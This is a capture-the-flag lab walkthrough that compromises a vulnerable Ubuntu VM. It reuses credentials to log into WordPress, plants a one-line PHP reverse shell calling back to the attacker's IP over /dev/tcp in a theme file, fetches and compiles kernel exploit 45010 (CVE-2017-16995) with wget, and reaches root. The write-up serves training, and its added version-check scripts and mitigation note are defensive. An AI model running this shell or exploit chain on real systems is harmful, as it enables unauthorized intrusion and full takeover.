[+] Finished: Fri Sep 13 21:39:20 2024
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 16.91 KB
[+] Data Received: 21.992 MB
[+] Memory used: 182.77 MB
[+] Elapsed time: 00:00:02

A WordPress habit
Installing WordPress requires creating an admin account, and builders often reuse the name of the system's first user. Treat this as a habit worth checking, not a rule; here victor appears both in /etc/passwd and as the WordPress author

Now move to WordPress: browse to the login page found earlier, /wordpress/wp-login.php
Combine the user victor from wpscan with the password follow_the_ippsec read through secrettier360
The credentials are
victor
follow_the_ippsec
(login screenshot in the original post)
The login succeeds


Look around inside

Two WordPress features are useful here

Plugins: the plugin upload accepts a zip, which can carry a PHP payload

Appearance > Theme Editor: theme PHP files can be edited in place, so a payload can be written into one

The builder may have blocked one of these, so these two upload points are the first things to try

Create an archive with zip and try uploading it as a plugin. It fails (screenshot in the original post)

Use the theme editor instead and paste the classic one-line PHP reverse shell into a theme file. Without knowing the firewall's egress rules, pick 443 as the callback port; it is the one most likely to be allowed out. Start a listener on the attacker box (nc on port 443) before saving the file

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/443 0>&1'"); ?>

Saving the file and requesting it triggers the shell (screenshot in the original post). The file was saved as secret.php inside the theme directory, so its URL is http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/secret.php
The theme directory path can be found with a web search, or taken straight from the wpscan output

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

Initial shell

With the initial shell in hand (screenshot in the original post), look at the system
whoami shows the current user
ip a shows the IP configuration
sudo -l lists what the current user may run through sudo

www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc

pwd

www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ pwd
pwd
/var/www/html/wordpress/wp-content/themes/twentynineteen

ls /home shows the users victor and saket
The sudo -l output above also says www-data may run /home/saket/enc as root without a password. This walkthrough leaves that binary alone and goes for the kernel instead, but it is the other path worth noting

www-data@ubuntu:/home/saket$ ls
ls
enc
password.txt
user.txt

In saket's home directory, reading user.txt gives what looks like the user flag

www-data@ubuntu:/home/saket$ cat password.txt
cat password.txt
follow_the_ippsec
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ ls -la
ls -la
total 36
drwxr-xr-x 2 root root  4096 Aug 31  2019 .
drwxr-xr-x 4 root root  4096 Aug 29  2019 ..
-rw------- 1 root root    20 Aug 31  2019 .bash_history
-rwxr-x--x 1 root root 14272 Aug 30  2019 enc
-rw-r--r-- 1 root root    18 Aug 29  2019 password.txt
-rw-r--r-- 1 root root    33 Aug 31  2019 user.txt
www-data@ubuntu:/home/saket$ 

uname -a shows the kernel version and architecture

Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Check the crontab


www-data@ubuntu:/home/saket$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
@reboot                 bash /root/t.sh
#

Privilege escalation

The @reboot entry runs /root/t.sh as root at boot, but /root is not readable as www-data, so it is no use here. The kernel is old (4.10.0-28, built in July 2017), so look it up on searchsploit. Kernel exploits can crash the target; on a real engagement they are a last resort, and on a lab VM take a snapshot first

┌──(kali㉿kali)-[~]
└─$ searchsploit Linux ubuntu 4.10.0-28                                  
------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                 |  Path
------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free           | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation  | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Es | linux/local/41760.txt
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
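A sanity check to run before copying anything to the target, added here as an example (not code from the original post or from searchsploit): compare the kernel string from uname -a against the bounds in the searchsploit titles above. The table is built only from the three hits shown (ids, categories from the paths, and the "< version" bounds from the titles); it is a version-string heuristic that knows nothing about distro backports, so a match means "worth trying", not "vulnerable".

```python
# Added example: filter searchsploit hits by the target's kernel version.
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]


def parse_kernel(uname_r: str) -> Version:
    """'4.10.0-28-generic' -> (4, 10, 0); only the upstream triple is compared."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", uname_r)
    if not m:
        raise ValueError("not a kernel version string: " + uname_r)
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


# (EDB id, category from the exploit path, exclusive upper bound or None)
CANDIDATES: List[Tuple[int, str, Optional[Version]]] = [
    # linux/local/45010.c: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - LPE
    (45010, "local", (4, 13, 9)),
    # linux/dos/43234.c: Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP UAF.
    # The title's 4.10.5 is the version it was tested on; only "< 4.14.3" is
    # used as a bound here (assumption).
    (43234, "dos", (4, 14, 3)),
    # linux/local/41760.txt is bounded by Ubuntu release (< 15.10), not by kernel
    # version, so it is not encoded; read the text and judge by hand.
]


def applicable(uname_r: str, categories: Tuple[str, ...] = ("local",)) -> List[int]:
    """EDB ids whose bound the kernel satisfies. Only "local" by default,
    because a dos/ entry crashes the box without giving a shell."""
    v = parse_kernel(uname_r)
    hits: List[int] = []
    for edb_id, category, upper in CANDIDATES:
        if category not in categories:
            continue
        if upper is not None and v >= upper:
            continue
        hits.append(edb_id)
    return hits
```

For the 4.10.0-28-generic kernel on this box the default call returns only 45010, which is the one the walkthrough uses; asking for dos entries as well adds 43234, which would only take the machine down.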

Download the exploit with -m, which mirrors a copy into the current directory; to read it in place use -x instead. -m takes EDB ids or paths, so the stray words "Linux ubuntu" in the command below are what produce the two "Could not find EDB-ID" warnings; searchsploit -m 45010 on its own is enough

┌──(kali㉿kali)-[~/testPrime1]
└─$ searchsploit Linux ubuntu -m 45010
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/testPrime1/45010.c

Compile it on Kali, or copy the .c to the target and compile it there. Compiling on the target matches its own glibc and headers; a binary built against Kali's much newer glibc may refuse to run on a 2017 Ubuntu, which is why both the binary and the source are transferred below

┌──(kali㉿kali)-[~/testPrime1]
└─$ gcc 45010.c -o 45010

Serve the files from Kali with PHP's built-in web server

┌──(kali㉿kali)-[~/testPrime1]
└─$ sudo php -S 0:80                  
[sudo] password for kali: 
[Thu Sep 19 15:29:21 2024] PHP 8.2.21 Development Server (http://0:80) started
[Thu Sep 19 15:30:21 2024] 192.168.50.153:38036 Accepted
[Thu Sep 19 15:30:21 2024] 192.168.50.153:38036 [200]: GET /45010
[Thu Sep 19 15:30:21 2024] 192.168.50.153:38036 Closing
[Thu Sep 19 15:31:28 2024] 192.168.50.153:38038 Accepted
[Thu Sep 19 15:31:28 2024] 192.168.50.153:38038 [200]: GET /45010.c
[Thu Sep 19 15:31:28 2024] 192.168.50.153:38038 Closing

Download the files from the shell on the target

www-data@ubuntu:/tmp$ wget http://192.168.50.147/45010
wget http://192.168.50.147/45010
--2024-09-19 00:30:10--  http://192.168.50.147/45010
Connecting to 192.168.50.147:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21616 (21K)
Saving to: '45010'

     0K .......... .......... .                               100%  514M=0s

2024-09-19 00:30:10 (514 MB/s) - '45010' saved [21616/21616]

www-data@ubuntu:/tmp$ wget http://192.168.50.147/45010.c
wget http://192.168.50.147/45010.c
--2024-09-19 00:31:17--  http://192.168.50.147/45010.c
Connecting to 192.168.50.147:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-c]
Saving to: '45010.c'

     0K .......... ..                                         100%  426M=0s

2024-09-19 00:31:17 (426 MB/s) - '45010.c' saved [13176/13176]

Compile with gcc in the target's shell

www-data@ubuntu:/tmp$ gcc 45010.c -o 45010-2
gcc 45010.c -o 45010-2
www-data@ubuntu:/tmp$ ls
ls
45010
45010-2
45010.c

Add execute permission with chmod +x

www-data@ubuntu:/tmp$ chmod +x 45010-2
chmod +x 45010-2

We have root. Done.

www-data@ubuntu:/tmp$ ./45010-2
./45010-2
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:5c:c7:58 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.153/24 brd 192.168.50.255 scope global dynamic ens33
       valid_lft 1343sec preferred_lft 1343sec
    inet6 fe80::dc85:1101:d755:d6fc/64 scope link 
       valid_lft forever preferred_lft forever

Use python to get a more interactive shell:
python -c "import pty;pty.spawn('/bin/bash')"

python -c "import pty;pty.spawn('/bin/bash')"
root@ubuntu:/tmp# 
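As an added example that is not part of the original write-up, here is the check a defender would run on the other side of this step: compare a kernel release string against the version bound in the searchsploit title for EDB-ID 45010 ("Linux Kernel < 4.13.9"). The sample `uname -a` line and the function names are constructed for this example.

```python
import re
from typing import Tuple

# Bound taken from the searchsploit title on the page:
# "Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation"
EDB_45010_FIXED_IN = "4.13.9"


def parse_release(release: str) -> Tuple[int, int, int]:
    """Turn a `uname -r` string such as '4.10.0-28-generic' into (4, 10, 0).

    Only the leading dotted numeric part is compared; the '-28-generic'
    suffix is the distro package revision, not the upstream version.
    """
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def in_affected_range(release: str, fixed_in: str = EDB_45010_FIXED_IN) -> bool:
    """True when the upstream version is strictly below the fixed version.

    Caveat: distro kernels backport fixes, so True means "check the package
    changelog", not "definitely exploitable".
    """
    return parse_release(release) < parse_release(fixed_in)


def triage(uname_a: str) -> dict:
    """Report the fields a defender cares about from a `uname -a` line.

    `uname -a` prints: kernel-name nodename kernel-release ..., so the
    release is the third whitespace-separated field.
    """
    release = uname_a.split()[2]
    major, minor, patch = parse_release(release)
    return {
        "release": release,
        "upstream": f"{major}.{minor}.{patch}",
        "edb_45010_range": in_affected_range(release),
    }


# Constructed sample line matching the version the write-up searched for
# ("4.10.0-28"); it is not output captured from the target.
SAMPLE_UNAME_A = "Linux ubuntu 4.10.0-28-generic #32-Ubuntu SMP x86_64 GNU/Linux"

if __name__ == "__main__":
    print(triage(SAMPLE_UNAME_A))
```

CVE-2017-16995, the bug behind 45010, is an eBPF verifier flaw; on a host that cannot be updated, `sysctl kernel.unprivileged_bpf_disabled=1` blocks the unprivileged bpf() calls the exploit depends on.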

Grab the root flag

root@ubuntu:/tmp# cd /root
cd /root
root@ubuntu:/root# ls -liah
ls -liah
total 92K
917506 drwx------  5 root root 4.0K Aug 31  2019 .
     2 drwxr-xr-x 24 root root 4.0K Aug 29  2019 ..
964588 -rw-------  1 root root 8.4K Sep  1  2019 .bash_history
917598 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
917597 drwx------  3 root root 4.0K Aug 30  2019 .cache
969791 -rw-------  1 root root  137 Aug 30  2019 .mysql_history
964098 drwxr-xr-x  2 root root 4.0K Aug 29  2019 .nano
917599 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
969796 -rw-r--r--  1 root root   66 Aug 31  2019 .selected_editor
969793 -rwxr-xr-x  1 root root  14K Aug 30  2019 enc
969795 -rw-r--r--  1 root root  305 Aug 30  2019 enc.cpp
969797 -rw-r--r--  1 root root  237 Aug 30  2019 enc.txt
969798 -rw-r--r--  1 root root  123 Aug 30  2019 key.txt
969794 -rw-r--r--  1 root root   33 Aug 30  2019 root.txt
969780 -rw-r--r--  1 root root  805 Aug 30  2019 sql.py
969790 -rwxr-xr-x  1 root root  442 Aug 31  2019 t.sh
964589 drwxr-xr-x 10 root root 4.0K Aug 30  2019 wfuzz
964464 -rw-r--r--  1 root root  170 Aug 29  2019 wordpress.sql
root@ubuntu:/root# cat root.txt
cat root.txt
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root# 

Summary

nmap scan: ports 22 and 80 are open
Port 80 serves nothing but a single image
Directory brute-forcing with the extensions php, txt and zip
Fuzzing finds a parameter; using it for file inclusion yields a username and password
Log in to the WordPress backend
Write a reverse shell into a theme, then attempt privilege escalation; the user is www-data
uname -a shows the kernel version, and searchsploit turns up a kernel privilege-escalation exploit
Escalate to root and upgrade the shell with python
Done

There seems to be another way to escalate privileges…
